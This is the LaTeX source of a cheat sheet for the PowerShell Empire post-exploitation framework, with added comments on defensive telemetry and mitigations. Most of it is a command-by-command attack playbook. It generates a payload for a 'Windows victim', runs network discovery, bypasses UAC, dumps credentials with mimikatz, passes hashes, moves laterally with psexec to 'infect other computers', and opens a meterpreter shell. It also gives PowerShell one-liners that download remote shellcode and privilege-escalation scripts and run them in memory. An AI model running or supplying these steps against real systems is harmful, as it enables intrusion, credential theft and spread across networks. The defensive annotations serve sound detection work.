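% Preamble of a Cheatography-generated cheat sheet ("Powershell Empire Cheat Sheet").
% Each statement sits on its own physical line: a `%` comments out the rest of
% the line it is on, so with the file collapsed onto one line everything after
% the first trailing comment (every \usepackage below) was silently disabled.
\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr} % For header and footer
\usepackage{multicol} % Allows multicols in tables
\usepackage{tabularx} % Intelligent column widths
\usepackage{tabulary} % Used in header and footer
\usepackage{hhline} % Border under tables
\usepackage{graphicx} % For images
\usepackage{xcolor} % For hex colours
%\usepackage[utf8x]{inputenc} % For unicode character support
\usepackage[T1]{fontenc} % Without this we get weird character replacements
\usepackage{colortbl} % For coloured tables
\usepackage{setspace} % For line height
\usepackage{lastpage} % Needed for total page number
\usepackage{seqsplit} % Splits long words.
%\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem} % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath} % Symbols
\usepackage{MnSymbol} % Symbols
\usepackage{wasysym} % Symbols
%\usepackage[english,german,french,spanish,italian]{babel} % Languages

% Document Info
% \pdfinfo writes these fields into the PDF metadata (pdfTeX primitive).
\author{fred}
\pdfinfo{
  /Title (powershell-empire.pdf)
  /Creator (Cheatography)
  /Author (fred)
  /Subject (Powershell Empire Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit
% These two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands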
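% Table helpers, colours, page header/footer, and the first two content tables.
% Line breaks are restored so that each trailing `%` comment ends its own line
% instead of commenting out the statements that follow it.
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{0515A3}
\definecolor{LightBackground}{HTML}{F7F7FC}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
% NOTE(review): the logo below is referenced by an absolute path on the
% generating host; the file will not exist on another machine, so building
% elsewhere needs a local copy of the logo and an adjusted path.
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
    \SetRowColor{DarkBackground}
    \vspace{-7pt}
    {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
        \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
    }
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
    \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Powershell Empire Cheat Sheet}}}} \\
    \normalsize{by \textcolor{DarkBackground}{fred} via \textcolor{DarkBackground}{\uline{cheatography.com/22666/cs/9078/}}}
\end{tabulary}
\end{multicols}}

\fancyfoot[L]{ \footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
  \SetRowColor{FootBackground}
  \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}}  \\
  \vspace{-2pt}fred \\
  \uline{cheatography.com/fred} \\
  \end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}}  \\
   \vspace{-2pt}Published 12th September, 2016.\\
   Updated 12th September, 2016.\\
   Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}}  \\
  \SetRowColor{white}
  \vspace{-5pt}
  %\includegraphics[width=48px,height=48px]{dave.jpeg}
  Measure your website readability!\\
  www.readability-score.com
\end{tabulary}
\end{multicols}}

\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.

\begin{multicols*}{4}
% Resources: the links are as published on this sheet (dated September 2016
% in the footer); the "Official Site" entry is a plain-HTTP URL.
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Resources}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{Official Site - \seqsplit{http://www.powershellempire.com} \newline % Row Count 1 (+ 1)
Indepth Tutorial + Word Excel Macro Example -  \newline % Row Count 2 (+ 1)
\seqsplit{https://www.youtube.com/watch?v=aDeJBe6eqps} \newline % Row Count 3 (+ 1)
\textasciitilde{}39:30 - BSides DC 2015 - Bridging the Gap: Lessons in Adversarial Tradecraft \newline % Row Count 5 (+ 2)
\seqsplit{https://www.youtube.com/watch?v=xHkRhRo3l8o} \newline % Row Count 6 (+ 1)
Offensive Active Directory with Powershell \newline % Row Count 7 (+ 1)
\seqsplit{https://www.youtube.com/watch?v=cXWtu-qalSs}% Row Count 8 (+ 1)
} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
% Installation (supply-chain note): the clone below is not pinned to a tag or
% commit, and setup/install.sh is then run as root. Whatever the default
% branch holds at clone time executes with full privileges, so read the
% script and check out a known revision first, on a dedicated lab host.
% NOTE(review): steps are as of the sheet's 2016 date; verify them against
% the current upstream repository before relying on them.
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Installation}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{`git clone \seqsplit{https://github.com/powershellempire/empire} ` \newline % Row Count 2 (+ 2)
`sudo apt-get install python-pip python-openssl` \newline % Row Count 3 (+ 1)
`cd empire` \newline % Row Count 4 (+ 1)
`cd setup ` \newline % Row Count 5 (+ 1)
`sudo ./install.sh`% Row Count 6 (+ 1)
} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}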
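\par\addvspace{1.3em}
% Remaining content tables of the cheat sheet. Line breaks are restored so
% that the "% Row Count" comments no longer swallow the rows after them, and
% comment fragments split across lines ("Count 7 (+ 1)") are not typeset.
% The added %-comments record what each stage looks like to a defender; they
% do not appear in the PDF.
%
% Execution: the stager step yields a single PowerShell command line carrying
% a Base64-encoded script. Telemetry that records it: process creation with
% command line (Security Event ID 4688 with command-line auditing, or Sysmon
% Event ID 1) and PowerShell Script Block Logging (Event ID 4104), which logs
% the script text after decoding.
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Execution \& Exploitation}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{{\bf{Create listener and generate Base64 cmd payload}} \newline % Row Count 2 (+ 2)
`sudo ./empire` \newline % Row Count 3 (+ 1)
`listeners` \newline % Row Count 4 (+ 1)
`set Name listenername` \newline % Row Count 5 (+ 1)
`execute` \newline % Row Count 6 (+ 1)
`usestager launcher listenername` \newline % Row Count 7 (+ 1)
`execute` (generate payload, copy \& paste into cmd on Windows victim) \newline % Row Count 9 (+ 2)
`agents` \newline % Row Count 10 (+ 1)
{\bf{Note:}} Type in `usestager` then hit TAB twice for more options.% Row Count 12 (+ 2)
} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
% Post exploitation: the situational_awareness modules are network and
% directory discovery (ARP scan, reverse DNS, session and share enumeration);
% the 10.0.0.0-10.0.0.255 range is the sheet's sample value.
% `bypassuac`: UAC bypasses generally depend on auto-elevation for members of
% the local Administrators group; the "Always notify" UAC level and working
% from a standard-user account are the usual mitigations.
% `mimikatz` / `creds` / `pth` / `steal_token`: LSA protection (RunAsPPL) and
% Credential Guard limit credential extraction from LSASS; unique
% per-host local administrator passwords (e.g. LAPS) limit reuse of a
% captured hash on other machines.
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Post Exploitation}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{`agents` \newline % Row Count 1 (+ 1)
`interact AGENTNAME` \newline % Row Count 2 (+ 1)
`sysinfo` \newline % Row Count 3 (+ 1)
`usemodule \seqsplit{situational\_awareness/network/arpscan`} \newline % Row Count 4 (+ 1)
`set Range 10.0.0.0-10.0.0.255` \newline % Row Count 5 (+ 1)
`execute` \newline % Row Count 6 (+ 1)
... \newline % Row Count 7 (+ 1)
`usemodule \seqsplit{situational\_awareness/network/reverse\_dns`} \newline % Row Count 9 (+ 2)
`set Range 10.0.0.0-10.0.0.255` \newline % Row Count 10 (+ 1)
`execute` \newline % Row Count 11 (+ 1)
... \newline % Row Count 12 (+ 1)
`usemodule \seqsplit{situational\_awareness/network/powerview/user\_hunter`} \newline % Row Count 14 (+ 2)
`execute` \newline % Row Count 15 (+ 1)
... \newline % Row Count 16 (+ 1)
`usemodule \seqsplit{situational\_awareness/network/powerview/share\_finder`} \newline % Row Count 18 (+ 2)
`set CheckShareAccess True` \newline % Row Count 19 (+ 1)
`execute` \newline % Row Count 20 (+ 1)
... \newline % Row Count 21 (+ 1)
`agents` \newline % Row Count 22 (+ 1)
`interact AGENTNAME` \newline % Row Count 23 (+ 1)
`bypassuac LISTENERNAME` \newline % Row Count 24 (+ 1)
`y` \newline % Row Count 25 (+ 1)
...wait for agent now active to appear... \newline % Row Count 26 (+ 1)
`agents` (look for a user with * as this indicates admin) \newline % Row Count 28 (+ 2)
`interact AGENTNAME` \newline % Row Count 29 (+ 1)
`mimikatz` (collect creds, etc...) \newline % Row Count 30 (+ 1)
} \tn
\end{tabularx}
\par\addvspace{1.3em}
\vfill
\columnbreak
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Post Exploitation (cont)}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{`creds` \newline % Row Count 1 (+ 1)
`dir \textbackslash{}\textbackslash{}COMPUTERNAME\textbackslash{}C\$` \newline % Row Count 2 (+ 1)
`creds` \newline % Row Count 3 (+ 1)
`pth 1` (passthehash using cred 1, a PID will be created) \newline % Row Count 5 (+ 2)
`steal\_token PIDNUM` \newline % Row Count 6 (+ 1)
`dir \textbackslash{}\textbackslash{}COMPUTERNAME\textbackslash{}C\$`% Row Count 7 (+ 1)
} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
% Lateral movement: PsExec-style execution installs a service on the target.
% On the target look for Service Control Manager Event ID 7045 (new service
% installed) paired with a network logon (Security Event ID 4624, logon
% type 3) from an unexpected source host. `test1` and `WIN10COMP.blah.com`
% are the sheet's sample values.
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Lateral Movement}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{`usemodule \seqsplit{situational\_awareness/network/powerview/find\_localadmin\_access`} \newline % Row Count 2 (+ 2)
`info` \newline % Row Count 3 (+ 1)
`execute` (computer-names vulnerable to psexec will appear) \newline % Row Count 5 (+ 2)
`usemodule \seqsplit{lateral\_movement/invoke\_psexec`} \newline % Row Count 6 (+ 1)
`info` \newline % Row Count 7 (+ 1)
`set Listener test1` \newline % Row Count 8 (+ 1)
`set ComputerName WIN10COMP.blah.com` (machine to attack) \newline % Row Count 10 (+ 2)
`info` \newline % Row Count 11 (+ 1)
`execute` \newline % Row Count 12 (+ 1)
You can repeat the above process to infect other computers on the domain.% Row Count 14 (+ 2)
} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Connect to a Meterpreter Multi-Handler}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{Start your meterpreter multi handler, then do the following: \newline % Row Count 2 (+ 2)
`interact NAME` (target name from the 'agents' menu) \newline % Row Count 4 (+ 2)
`usemodule \seqsplit{code\_execution/invoke\_shellcode`} \newline % Row Count 5 (+ 1)
`info` \newline % Row Count 6 (+ 1)
`set lhost IPADDRESS` (the IP in your multi-handler session) \newline % Row Count 8 (+ 2)
`set lport PORT` (the port in your multi-handler session) \newline % Row Count 10 (+ 2)
`execute` (wait...) \newline % Row Count 11 (+ 1)
(a meterpreter session will appear in metasploit)% Row Count 12 (+ 1)
} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Powersploit}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{Source - \seqsplit{https://github.com/PowerShellMafia/PowerSploit/} \newline % Row Count 2 (+ 2)
{\bf{Demos}} \newline % Row Count 3 (+ 1)
User Hunting - \seqsplit{https://www.sixdub.net/?p=591} \newline % Row Count 4 (+ 1)
Reverse meterpreter shell - DLL Injection using PowerSploit and Metasploit \newline % Row Count 6 (+ 2)
\seqsplit{https://www.youtube.com/watch?v=yKoD5Oy8CKQ} \newline % Row Count 7 (+ 1)
PowerShell Toolkit: PowerSploit - Gaining Shells Without Writing To Disk \newline % Row Count 9 (+ 2)
\seqsplit{https://www.youtube.com/watch?v=LEll6qa-REY}% Row Count 10 (+ 1)
} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
% The two tables below use download-and-execute one-liners: the script is
% fetched from a mutable `master` branch and evaluated in memory with no
% integrity check, so its content is whatever that branch holds at fetch time.
% Defensive visibility: AMSI and Script Block Logging (Event ID 4104) see the
% downloaded script text even though nothing is written to disk; PowerShell
% Constrained Language Mode restricts the New-Object call these one-liners
% depend on; proxy/DNS logs show the fetch from the GitHub raw-content hosts.
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Powersploit Example}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{`cmd` \newline % Row Count 1 (+ 1)
`powershell` \newline % Row Count 2 (+ 1)
`IEX (New-Object \seqsplit{Net.WebClient).DownloadString("https://github.com/PowerShellMafia/PowerSploit/raw/master/CodeExecution/Invoke-Shellcode.ps1")`}% Row Count 5 (+ 3)
} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bf\textcolor{white}{Powersploit Priv Esc}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{`cmd` \newline % Row Count 1 (+ 1)
`powershell` \newline % Row Count 2 (+ 1)
`IEX (New-Object \seqsplit{Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1")`} \newline % Row Count 5 (+ 3)
`IEX (New-Object \seqsplit{Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Privesc.psd1")`} \newline % Row Count 8 (+ 3)
`Invoke-AllChecks`% Row Count 9 (+ 1)
} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
% That's all folks
\end{multicols*}
\end{document}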